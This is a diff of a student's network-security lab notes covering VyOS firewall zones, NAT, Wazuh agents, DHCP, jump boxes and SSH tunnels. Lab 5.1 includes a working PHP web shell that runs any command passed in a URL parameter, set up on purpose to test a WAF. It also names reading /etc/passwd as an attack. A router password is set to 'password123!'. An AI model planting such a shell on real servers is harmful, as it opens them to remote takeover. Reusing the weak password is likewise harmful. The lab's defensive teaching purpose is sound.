![image](../../../assets/57d3e4d5-2d74-45c7-91e1-7e0066bcaf10.png) \
![image](../../../assets/26d035b6-8587-4277-ac33-3b4824459cc8.png)

7
net-sec-controls-sec350/labs/week02/centOS_repo_fix.md Normal file
View file

@ -0,0 +1,7 @@
# CentOS Repo Fix
They changed the URLs for the repos for CentOS. to fix, change the repos in yum's config:
```
sudo sed -i s/mirror.centos.org/vault.centos.org/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^#.*baseurl=http/baseurl=http/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^mirrorlist=http/#mirrorlist=http/g /etc/yum.repos.d/CentOS-*.repo
```

80
net-sec-controls-sec350/labs/week03/lab3.1-segmentation-1.md Normal file
View file

@ -0,0 +1,80 @@
# Lab 3.1 Segmentation 1
In this lab, we are going to segment our network by adding a new firewall and a new network (MGMT). We will retire our log01 server and replace it with a new server on the MGMT network.
___
# if you got this far...you can shutdown log01. this machine is no longer needed
- shutdown log01
- On web01, remove your rsyslog dropin configuration from `/etc/rsyslog.d` (comment out the `user.notice` and `authpriv.*` lines)
- On fw01, remove syslog host setting from configuration: `delete system syslog host 172.16.50.5`
___
## configure wks01 (LAN)
- IP Address: 172.16.150.50\24
- Gateway: 172.16.150.2
- DNS: 172.16.150.2
## fw01 - create a rule for NAT from MGMT to WAN
```
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
```
## fw-mgmt
![image](../../../assets/e9fe5785-ef2b-4efa-9cc2-f10c25cc9476.png) \
Configure your fw-mgmt firewall's hostname with interface descriptions and interface addresses:
- eth0: LAN- 172.16.150.3/24
- eth1: MGMT- 172.16.200.2/28 (NOTE: MGMT is using a /28!)
```
set interfaces ethernet eth0 description LAN
set interfaces ethernet eth1 description MGMT
set interfaces ethernet eth0 address 172.16.150.3/24
set interfaces ethernet eth1 address 172.16.200.2/28
```
![image](../../../assets/68f108b9-2a62-4575-9614-c2ec286093ad.png)
Set the following:
- gateway next-hop: `set protocols static route 0.0.0.0/0 next-hop 172.16.150.2`
- name server to your fw01s LAN interface address: `set system name-server 172.16.150.2`
- dns forwarding such that requests are allowed from your management subnet and management interface.
```
set service dns forwarding listen-address 172.16.200.2
set service dns forwarding allow-from 172.16.200.0/28
set service dns forwarding system
```
## configure mgmt02 (MGMT)
- IP Address: 172.16.200.11/28
- Gateway: 172.16.200.2
- DNS: 172.16.200.2
## RIP on FW1 and FW-MGMT
fw01
```
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
```
fw-mgmt
```
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
```
## configure jump | wazuh-charlotte (MGMT)
- IP: 172.16.200.10/28
- Gateway: 172.16.200.2
- DNS: 172.16.200.2
### netplan configuration (an alternative to nmtui)
/etc/netplan/00-installer-config.yaml is the config file
![image](../../../assets/fee62fbf-d5a3-4564-a8a4-2c09ee5e3a9e.png)
`sudo netplan apply`
`sudo hostnamectl hostname wazuh-charlotte`

39
net-sec-controls-sec350/labs/week03/lab3.2-wazuh.md Normal file
View file

@ -0,0 +1,39 @@
# Lab 3.2 - Wazuh
In this lab, we are going to experiment with a far more modern logging system called Wazuh. Wazuh is one of several ELK based SIEMs. We are using this one because of the relatively ease of installation as well as functionality. Unlike a traditionally syslog client and server, Wazuh allows us to install agents on supported systems. Agents can refine that information sent to their SIEM for streamlined analysis.
>[!Warning]
>TAKE A SNAPSHOT BEFORE INSTALLATION
## Installation
For a single node installation on wazuh, run the following command.
`curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i`
(added -i to ignore minimum requirements of 2CPU and 4 GB RAM)
>[!Note]
>Save the auto-generated password, you will need it later
## Wazuh/OSSEC Agent on web01
- Wazuh dropdown > management > groups > create a new group called linux
- Wazuh dropdown > agents > Deploy a new agent with the following configuration.
- Redhat/CentoS
- CentOS 6 or higher (Note, it will work on rocky 8)
- x86_64
- 172.16.200.10
- Linux
- run the generated command on web01 to install the agent:
```
curl -o wazuh-agent-4.7.5-1.x86_64.rpm https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.5-1.x86_64.rpm && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='web01-charlotte' rpm -ihv wazuh-agent-4.7.5-1.x86_64.rpm
```
- if you can't access through a web browser. try going to http://172.16.200.10/app/login. for some reason this worked for me
![image](../../../assets/c6c6ae88-635e-4db1-a1d3-e1473bf63653.png)
![image](../../../assets/1609a92a-ffe2-4d93-8477-f6669a95c2f5.png)
- start the agent
```
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## to view security events
dropdown > modules > security events

201
net-sec-controls-sec350/labs/week04/lab4.1-network-firewalls1.md Normal file
View file

@ -0,0 +1,201 @@
# network firewalls 1
# Configure fw01
- Create and link firewall zones to interfaces (eth0, eth1, eth2)
```
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
```
### WAN and DMZ firewalls
In the illustration below, we have created firewalls for WAN to DMZ and DMZ to WAN,
we are going to lock them down with a default drop directive, and we will log violations of the firewall rules.
We have also assigned firewalls to the respective direction of communication between zones.
Firewalls for WAN and DMZ
```
set firewall name WAN-to-DMZ default-action drop
set firewall name DMZ-to-WAN default-action drop
set firewall name WAN-to-DMZ enable-default-log
set firewall name DMZ-to-WAN enable-default-log
```
Assigning Firewalls to Zones
```
set zone-policy zone WAN from DMZ firewall name DMZ-to-WAN
set zone-policy zone DMZ from WAN firewall name WAN-to-DMZ
```
On fw01, monitor your firewall logs with the following command:
`tail -f /var/log/messages | grep WAN`
## Allow http inbound
```
set firewall name WAN-to-DMZ rule 10 description "Allow HTTP from WAN to DMZ"
set firewall name WAN-to-DMZ rule 10 action accept
set firewall name WAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name WAN-to-DMZ rule 10 destination port 80
set firewall name WAN-to-DMZ rule 10 protocol tcp
```
## allow return traffic
this won't work if you try to ping/curl, because traffic back out to WAN is still blocked
these commands will allow established connection through DMZ-to-WAN
```
set firewall name DMZ-to-WAN rule 1 action accept
set firewall name DMZ-to-WAN rule 1 state established enable
```
>[!Note]
>We will reserve rule 1 for two conditions. The first is to allow established connections back out again, the second would be to have an open rule where all connections are allowed. Typically this would be the only rule in such a firewall.
## DMZ and LAN Traffic Firewalls
```
set firewall name LAN-to-DMZ default-action drop
set firewall name DMZ-to-LAN default-action drop
set firewall name LAN-to-DMZ enable-default-log
set firewall name DMZ-to-LAN enable-default-log
```
Assigning Firewalls to Zones
```
set zone-policy zone LAN from DMZ firewall name DMZ-to-LAN
set zone-policy zone DMZ from LAN firewall name LAN-to-DMZ
```
### allow ports 1514 and 1515
```
set firewall name DMZ-to-LAN rule 10 description "wazuh agent communication with server"
set firewall name DMZ-to-LAN rule 10 action accept
set firewall name DMZ-to-LAN rule 10 destination address 172.16.200.10
set firewall name DMZ-to-LAN rule 10 destination port 1514,1515
set firewall name DMZ-to-LAN rule 10 protocol tcp
```
### allow return traffic from DMZ
```
set firewall name DMZ-to-LAN rule 1 action accept
set firewall name DMZ-to-LAN rule 1 state established enable
```
### allow return traffic from LAN
```
set firewall name LAN-to-DMZ rule 1 action accept
set firewall name LAN-to-DMZ rule 1 state established enable
```
## lan to wan?
yes, clients usually need direct access to internet. we will have to configure proxies for this later\
Create a default LAN to WAN firewall and associate it with the appropriate zone policy. This firewall will have only one rule allowing LAN clients to initiate WAN connections.
```
set zone-policy zone WAN from LAN firewall name LAN-to-WAN
set firewall name LAN-to-WAN default-action drop
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action accept
```
### allow return traffic WAN to LAN
```
set zone-policy zone LAN from WAN firewall name WAN-to-LAN
set firewall name WAN-to-LAN default-action drop
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action accept
set firewall name WAN-to-LAN rule 1 state established enable
```
## LAN to DMZ
As communication between LAN and DMZ is currently broken, we need to create a firewall, assign to the appropriate zone policy and adjust it to only allow the traffic we want to go through. We want wks01 to be able to browse to web01 and we want mgmt01 to ssh into anything on the DMZ.
With that in mind, create firewall rules on LAN-TO-DMZ that allows
- 80/tcp from LAN to web01.
```
set firewall name LAN-to-DMZ rule 10 description "Allow HTTP from LAN to DMZ"
set firewall name LAN-to-DMZ rule 10 action accept
set firewall name LAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name LAN-to-DMZ rule 10 destination port 80
set firewall name LAN-to-DMZ rule 10 protocol tcp
```
- 22/tcp from mgmt01 to the DMZ
```
set firewall name LAN-to-DMZ rule 20 description "Allow SSH from MGMT-01 to DMZ"
set firewall name LAN-to-DMZ rule 20 action accept
set firewall name LAN-to-DMZ rule 20 source address 172.16.150.10
set firewall name LAN-to-DMZ rule 20 destination port 22
set firewall name LAN-to-DMZ rule 20 protocol tcp
```
# Configure fw-mgmt
## LAN-to-MGMT
```
set zone-policy zone LAN interface eth0
set zone-policy zone MGMT interface eth1
```
Firewalls for WAN and DMZ
```
set firewall name LAN-to-MGMT default-action drop
set firewall name MGMT-to-LAN default-action drop
set firewall name LAN-to-MGMT enable-default-log
set firewall name MGMT-to-LAN enable-default-log
```
Assigning Firewalls to Zones
```
set zone-policy zone MGMT from LAN firewall name LAN-to-MGMT
set zone-policy zone LAN from MGMT firewall name MGMT-to-LAN
```
### LAN-to-MGMT firewall
allow established traffic
```
set firewall name LAN-to-MGMT rule 1 action accept
set firewall name LAN-to-MGMT rule 1 state established enable
```
allow SSH MGMT-01->wazuh
```
set firewall name LAN-to-MGMT rule 10 description "wazuh SSH access from MGMT-01"
set firewall name LAN-to-MGMT rule 10 action accept
set firewall name LAN-to-MGMT rule 10 source address 172.16.150.10
set firewall name LAN-to-MGMT rule 10 destination address 172.16.200.10
set firewall name LAN-to-MGMT rule 10 destination port 22
set firewall name LAN-to-MGMT rule 10 protocol tcp
```
allow HTTPS MGMT-01->wazuh
```
set firewall name LAN-to-MGMT rule 20 description "wazuh HTTPS access from MGMT-01"
set firewall name LAN-to-MGMT rule 20 action accept
set firewall name LAN-to-MGMT rule 20 source address 172.16.150.10
set firewall name LAN-to-MGMT rule 20 destination address 172.16.200.10
set firewall name LAN-to-MGMT rule 20 destination port 443
set firewall name LAN-to-MGMT rule 20 protocol tcp
```
allow wazuh agent communication
```
set firewall name LAN-to-MGMT rule 30 description "wazuh agent communication with server"
set firewall name LAN-to-MGMT rule 30 action accept
set firewall name LAN-to-MGMT rule 30 destination address 172.16.200.10
set firewall name LAN-to-MGMT rule 30 destination port 1514,1515
set firewall name LAN-to-MGMT rule 30 protocol tcp
```
## MGMT-to-LAN
Allows established traffic back again
```
set firewall name MGMT-to-LAN rule 1 action accept
set firewall name MGMT-to-LAN rule 1 state established enable
```
Allows MGMT to initiate any connection to the LAN
```
set firewall name MGMT-to-LAN rule 10 description "allows MGMT to LAN"
set firewall name MGMT-to-LAN rule 10 action accept
set firewall name MGMT-to-LAN rule 10 destination address 172.16.150.0/24
```
Allows MGMT to initiate any connection to the DMZ (yes, this is in the MGMT-to-LAN zone-policy, because MGMT is not directly connected to DMZ)
```
set firewall name MGMT-to-LAN rule 20 description "allows MGMT to DMZ"
set firewall name MGMT-to-LAN rule 20 action accept
set firewall name MGMT-to-LAN rule 20 destination address 172.16.50.0/29
```

53
net-sec-controls-sec350/labs/week05/lab5.1-wazuh-waf.md Normal file
View file

@ -0,0 +1,53 @@
# Lab 5.1 - Wazuf WAF
In this lab we are going to augment web01 by adding a web application firewall (WAF). The wazuh agent should currently be able to forward apache error logs so a good deal of our work is done for us already. We are then going to run malicious http requests against web01 to see how our WAF performs.
## patch fw01
>[!Warning]
> web01's ability to talk to the WAN and the WANs ability to talk to web01 might be currently restricted. Updating and patching the server is one of the things we must do from time to time. VYOS itself cannot filter by domain name such as allowing traffic to updates.centos.org. It has to be by IP address or subnet. For this reason, many organizations go to an internal mirror for this purpose. We will use a work around.
### WAN-to-DMZ
- add a new permanent rule to vyos such that established connections from the DMZ-to-WAN are allowed back through the WAN-to-DMZ
```
set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable
```
### DMZ-to-WAN
temporary rule for software updates that we either delete, disable or discard when complete
```
set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
```
## Adding mod_security, the core rule set and php to web01
The following command will install mod_security, the core ruleset associated with this layer 7 firewall and the php necessary to make a webshell work.
```
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
```
- after installation delete temporary rule on fw01
```
delete firewall name DMZ-to-WAN rule 999
```
- create a php webshell at `/var/www/html/shell.php` on web01
```
<!-- source: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```
while this shell works for commands like `whoami` and `/sbin/ifconfig`, modsecurity will prevent dangerous commands like `cat /etc/passwd` from being executed

85
net-sec-controls-sec350/labs/week06/lab6.1-port-forwarding-and-jump boxes.md Normal file
View file

@ -0,0 +1,85 @@
# Lab 6.1: Port Forwarding and Jump Boxes
## RW01 -> WEB
security issue: rw01 knows the internal routing for our DMZ and used this information to create a static route from SEC350-WAN to the DMZ. A better alternative is to mask the presence of the DMZ altogether with NAT destination rules.
- remove static ip route from rw01 to DMZ
```
sudo ip route del 172.16.50.0/29
```
## WAN to DMZ NAT
We've worked with NAT **source** rules when dealing with traffic from inside the network going out to the WAN. Now we are going to add a NAT **destination** rule (aka port forwarding) so that any port 80 traffic coming to our firewall's WAN/eth0 interface will be forwarded on to web01.
```
set nat destination rule 10 description "HTTP->WEB01"
set nat destination rule 10 inbound-interface eth0
set nat destination rule 10 destination port 80
set nat destination rule 10 protocol tcp
set nat destination rule 10 translation address 172.16.50.3
```
## Jump server
- log01 is back! but it's a jump server now
- IP Address: 172.16.50.4/29
- hostname: jump-charlotte
- Adjust the firewall rules from LAN-TO-DMZ such that mgmt01 can ssh into any server on the DMZ.
- Make sure that fw01 is only listening for SSH on the LAN interface (172.16.150.2) and not on all interfaces (0.0.0.0/0)
![image](../../../assets/76304685-062f-41df-ac18-092174428aa2.png)
sudo systemctl restart ssh
On rw01, create a dedicated keypair that will only be used for ssh access to jump. make sure to name the keypair something other than the default and add a comment indicating its purpose. Make sure to add a passphrase when prompted.
```
ssh-keygen -t rsa -b 4096 -C "ssh to jump"
name of file: jump-charlotte
```
(this is a public key! it's okay to share, unlike private keys)
```
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDLLKDg5fIw8CINt5IOY3vZ6XiudxKn0sXZ1hTWbugfKQ9NZjfSCbboxIlVpyqAwnFzf+3oJcPpnlVLjXpugJe6ghfuLsO/1fdqFQ5/PBcQbJXFvdIH93MJ78sBUhT+SbhHLas6KjShSOhNz5fRYOMOTpCtB7eQhk5q3gqTEvmDejgWZPphyAQJCnB0hw+J76jl3t68Q+FtD57RWhWhp/0ZQPfjY+hnJOfLaD+Zs0tsxvYXqDuPhRt2J2xUHF8LgaqZYkosIllfcX//tmEnQ90nU+zLu3jje8Pqy4mfjGsV8wZ+ug7ModwJwR2ToieqoiyOnDq1ytG0r5sKjeM5RTX6tJTOl8ltr7E51u0bajjym0ZL4kT0W82Eld/DV4+BzbEB6yCSWWVwo/eKoqkGBIHpIibzkjPGCQ4O0tq3s+04DpOpucDqk0J+Yphdj/qmK/mYFLU0xKZnIJl8otyItyVhV2zTIn64PQ3gEE8z0O4GjEJEfhkJ29ydtXXDFIpCfSirmfH7HbXlwgUmxHJqnCBqZ8eKb/n52ekaD0SIOPQE76RmR540cus3mvo3t30Ak79NBSjEh82k2rP42eVx/GhF/o3u8DdCF3xA46dzqt1HMvOpnOjdvbldP076VKkxV/px9nE7mJZysxei8SisrSbwn7vxLem4LrDsAIxfsGcULw== ssh to jump
```
create a passwordless user called `charlotte-jump` on jump. Copy over the public component of the jump keypair you just created on rw01 to the new user's `.ssh/authorized_keys` file.
```
useradd -m -d /home/charlotte-jump -s /bin/bash charlotte-jump
sudo sed -i 's/PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# create .ssh directory, give perms to user
mkdir -p /home/charlotte-jump/.ssh
chmod 700 /home/charlotte-jump/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDLLKDg5fIw8CINt5IOY3vZ6XiudxKn0sXZ1hTWbugfKQ9NZjfSCbboxIlVpyqAwnFzf+3oJcPpnlVLjXpugJe6ghfuLsO/1fdqFQ5/PBcQbJXFvdIH93MJ78sBUhT+SbhHLas6KjShSOhNz5fRYOMOTpCtB7eQhk5q3gqTEvmDejgWZPphyAQJCnB0hw+J76jl3t68Q+FtD57RWhWhp/0ZQPfjY+hnJOfLaD+Zs0tsxvYXqDuPhRt2J2xUHF8LgaqZYkosIllfcX//tmEnQ90nU+zLu3jje8Pqy4mfjGsV8wZ+ug7ModwJwR2ToieqoiyOnDq1ytG0r5sKjeM5RTX6tJTOl8ltr7E51u0bajjym0ZL4kT0W82Eld/DV4+BzbEB6yCSWWVwo/eKoqkGBIHpIibzkjPGCQ4O0tq3s+04DpOpucDqk0J+Yphdj/qmK/mYFLU0xKZnIJl8otyItyVhV2zTIn64PQ3gEE8z0O4GjEJEfhkJ29ydtXXDFIpCfSirmfH7HbXlwgUmxHJqnCBqZ8eKb/n52ekaD0SIOPQE76RmR540cus3mvo3t30Ak79NBSjEh82k2rP42eVx/GhF/o3u8DdCF3xA46dzqt1HMvOpnOjdvbldP076VKkxV/px9nE7mJZysxei8SisrSbwn7vxLem4LrDsAIxfsGcULw== ssh to jump" >> /home/charlotte-jump/.ssh/authorized_keys
# set perms, set new user as directory owner
chmod 600 /home/charlotte-jump/.ssh/authorized_keys
chown -R charlotte-jump:charlotte-jump /home/charlotte-jump/.ssh
systemctl restart sshd
```
## install wazuh agent on jump
on mgmt01
```
wget https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.3-1.x86_64.rpm
scp wazuh-agent-4.7.3-1.x86_64.rpm charlotte@172.16.50.4:~
```
on jump
```
scp wazuh-agent-4.7.3-1.x86_64.rpm charlotte@172.16.50.4:~
sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='jump-charlotte' rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
![image](../../../assets/500def07-6fb1-4fb5-82a8-4c4f433e3861.png)

79
net-sec-controls-sec350/labs/week07/lab7.1-assessment-prep.md Normal file
View file

@ -0,0 +1,79 @@
# Lab 7.1 Assessment Prep
Several systems in your current environment will be removed the day before the assessment (3/27), first thing in the morning.
- **rw01** -> **traveler**
- **fw01** -> **edge01**
- **web01** -> **nginx01**
```
You are on your own for the assessment.
Open notes and internet, just no open neighbor.
This is really a test of your notes.
You will be getting new VM's.
Don't be late, as you will likely need the full time.
```
## fw01 configuration Backup
- **edge01**: (this new firewall will be very close in configuration).
- You might also consult your the example week 4 configurations [here](../configs/fw01/fw01.config.week04.txt)
- Provide the raw commands necessary to reconstitute your firewall: (Remember, there may be some adjustments in IP addresses and rules for your internal systems.)
## Assessment Description
For the assessment, you will be given a 3 zone network to configure that consists of:
- **traveler**. A WAN based road warrior user running Windows 10. (this replaces the linux rw01)
- **edge01**. A vyOS Firewall with three interfaces (WAN, DMZ, LAN). You will need to add an interface using vCenter. (this replaces fw01)
- **nginx01**. A DMZ based nginx web server running Ubuntu (this replaces web01 and apache)
- **dhcp01**. A LAN based dhcp server running Ubuntu
## Requirements
- All systems should have an accurate hostname.
- All Linux systems should have a named sudo or administrator user.
- The two new ubuntu systems do not have a host firewall enabled, this is ok (for now)
- wks1, mgmt01 should be able to surf the internet.
- wks1, mgmt01 should be able to navigate to nginx01
- mgmt01 should be able to ssh to nginx01
- nginx01 and dhcp01 should have wazuh agents installed and be able to connect to wazuh
- nginx01 should have a custom web page (practice this on jump)
- traveler should be able to get to nginx01's custom test page by navigating to edge01's WAN IP address.
- traveler should be able to perform ssh keybased authentication with jump. Traveler is a Windows box, but ssh on powershell is nearly exactly the same as linux to include key generation. You will need to add a new public key to authorized_keys.
- dhcp01 should serve a pool of dhcp addresses to the LAN from .100 to .150.
- WKS1 should use dhcp addressing
## Hints
- You do not need to work serially through this assessment, it is the end result that matters. If you are waiting for a reboot on traveler, then start configuring your other servers.
- Get all communications working BEFORE creating zones and locking down the firewalls. It's terribly difficult to debug both services and network firewalls at the same time.
- Make sure to link your firewalls to the appropriate From and To zones.
- Make sure you have the correct netmask on all Linux systems.
- Restart any service if you touch a configuration file (network, nginx, rsyslog, etc…).
- Make sure you include the appropriate vsphere label on all deliverables where your name is not obvious in the console.
- Check every VM's network settings to make sure they are on the correct segment.
- Don't forget to look at `/var/log/messages` to debug firewall issues.
- Do not try to use the default gateway address 10.0.17.2 as your WAN interface IP address as this will cause problems for other students and might be embarrassing.
## Nginx Web Server
Practice this on jump (it is an ubuntu box).
## Ubuntu DHCP Server
You can also practice this on jump, just move it to LAN, change the IP to something else and see if you can get wks01 to use dhcp services for IP, Netmask, Gateway and DNS settings. Make sure to reset wks01 to static.
## Traveler is a Windows System
You should research how to create a keypair using powershell or putty and make sure you can adjust jumps authorized_keys file to use your new windows public key.
## Deliverable 3. Practice this on either mgmt02 or wks01. Figure out how to create a keypair using either powershell or PuTTY, transfer the public portion to one of your linux systems and demonstrate a passwordless login from windows to a linux system.
## Clearing the firewall configuration
You should rehearse vyos commands by clearing your current configuration. The following commands will do that. Note, this configuration will likely have the vyos/vyos password combination because that is what it ships with.
```
configure
load /opt/vyatta/etc/config.boot.default
commit
save
# to save and load a backup config file
save backup_1
load /config/backup_1
```

50
net-sec-controls-sec350/labs/week09/lab9.1-AdHocVPN.md Normal file
View file

@ -0,0 +1,50 @@
# Lab 9.1 - Ad Hoc VPN with SSH
SSH allows you to create a remote port forwarding tunnel such that connections to a local port on traveler will traverse an ssh tunnel from traveler to jump and then be forwarded to a system of your choice, say mgmt02.
- Enable RDP on mgmt02
- Create a named local administrator account (charlotte) if not done so already
- Create the DMZ-to-LAN and LAN-to-MGMT rules necessary for RDP to connect to mgmt02
```
# on edge-02
set firewall name DMZ-to-LAN rule 40 action 'accept'
set firewall name DMZ-to-LAN rule 40 description 'jump to RDP'
set firewall name DMZ-to-LAN rule 40 destination address '172.16.200.11'
set firewall name DMZ-to-LAN rule 40 destination port '3389'
set firewall name DMZ-to-LAN rule 40 protocol 'tcp'
# on fw-mgmt
set firewall name LAN-to-MGMT rule 40 action 'accept'
set firewall name LAN-to-MGMT rule 40 description 'jump to RDP'
set firewall name LAN-to-MGMT rule 40 destination address '172.16.200.11'
set firewall name LAN-to-MGMT rule 40 destination port '3389'
set firewall name LAN-to-MGMT rule 40 protocol 'tcp'
```
source: https://www.cloudthat.com/resources/blog/a-guide-to-access-rdp-through-ssh-tunneling-using-putty
## Invoke an SSH connection from traveler to jump such that RDP connections in that tunnel are redirected to mgmt02.
### Step 1: Configure PuTTY for SSH Tunneling
- Launch PuTTY on your source Windows machine
- In the "Session" category:
- Enter the IP of jump box[actually the firewall interface -PF] (10.0.17.151)
- Keep port 22 / SSH
- Optionally save your session configuration
### Step 2: Set Up the SSH Tunnel for RDP
- In the PuTTY Configuration window, navigate to Connection > SSH > Tunnels
- Configure the tunnel with:
- Source port: 3390 (or any unused local port)
- Destination: 172.16.200.11:3389 (mgmt02)
- Select "Local" and "Auto" options
- Click "Add" to create the tunnel
### Step 3: Connect to the Jump Box
- Return to the "Session" category
- save your configuration
- Click "Open" to connect to the Linux jump box/ enter jump box creds
### Step 4: Connect via RDP Through the Tunnel
- With the SSH connection active, open Remote Desktop Connection on your source Windows machine
- In the "Computer" field, enter: localhost:3390
- Click "Connect" and enter credentials for the destination Windows machine

57
net-sec-controls-sec350/machines/DHCP01.md Normal file
View file

@ -0,0 +1,57 @@
# DHCP01 Configuration
## Basic Setup
- Set hostname to `dhcp01-charlotte`
- Add sudo user `charlotte`
Set network via netplan:
- IP Address: `172.16.150.151/24`
- Gateway & DNS: `172.16.150.2`
- Network adapter: LAN
## Install and Configure DHCP Server
Install DHCP server
```bash
sudo apt update
sudo apt install isc-dhcp-server -y
```
Configure DHCP server
```bash
> sudo nano /etc/dhcp/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 172.16.150.255;
option routers 172.16.150.2;
option domain-name-servers 172.16.150.2;
subnet 172.16.150.0 netmask 255.255.255.0 {
range 172.16.150.100 172.16.150.150;
}
```
Configure the interface for DHCP server:
```bash
> sudo nano /etc/default/isc-dhcp-server
...
INTERFACESv4="ens160"
INTERFACESv6=""
...
```
Start and enable DHCP server
```bash
sudo systemctl enable isc-dhcp-server
sudo systemctl restart isc-dhcp-server
```
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='dhcp01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

197
net-sec-controls-sec350/machines/EDGE01.md Normal file
View file

@ -0,0 +1,197 @@
# EDGE01 Configuration
## Initial Setup
- Change password:
```
configure
set system login user vyos authentication plaintext-password password123!
commit
save
```
- Change hostname:
```
configure
set system host-name edge01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway and DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
# Port Forwarding for HTTP
set nat destination rule 10 description "HTTP->NGINX01"
set nat destination rule 10 inbound-interface eth0
set nat destination rule 10 destination port 80
set nat destination rule 10 protocol tcp
set nat destination rule 10 translation address 172.16.50.3
# Port Forwarding for SSH
set nat destination rule 20 description "SSH->JUMP"
set nat destination rule 20 inbound-interface eth0
set nat destination rule 20 destination port 22
set nat destination rule 20 protocol tcp
set nat destination rule 20 translation address 172.16.50.4
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
```
configure
# Create Zone-Based Firewalls
# WAN-to-DMZ
set firewall name WAN-to-DMZ default-action drop
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable
set firewall name WAN-to-DMZ rule 10 description "allow HTTP from WAN to DMZ"
set firewall name WAN-to-DMZ rule 10 action accept
set firewall name WAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name WAN-to-DMZ rule 10 destination port 80
set firewall name WAN-to-DMZ rule 10 protocol tcp
set firewall name WAN-to-DMZ rule 20 action accept
set firewall name WAN-to-DMZ rule 20 description "SSH to JUMP"
set firewall name WAN-to-DMZ rule 20 destination address 172.16.50.4
set firewall name WAN-to-DMZ rule 20 destination port 22
set firewall name WAN-to-DMZ rule 20 protocol tcp
# DMZ-to-WAN
set firewall name DMZ-to-WAN default-action drop
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action accept
set firewall name DMZ-to-WAN rule 1 state established enable
# LAN-to-DMZ
set firewall name LAN-to-DMZ default-action drop
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action accept
set firewall name LAN-to-DMZ rule 1 state established enable
set firewall name LAN-to-DMZ rule 10 description "Allow HTTP from LAN to DMZ"
set firewall name LAN-to-DMZ rule 10 action accept
set firewall name LAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name LAN-to-DMZ rule 10 destination port 80
set firewall name LAN-to-DMZ rule 10 protocol tcp
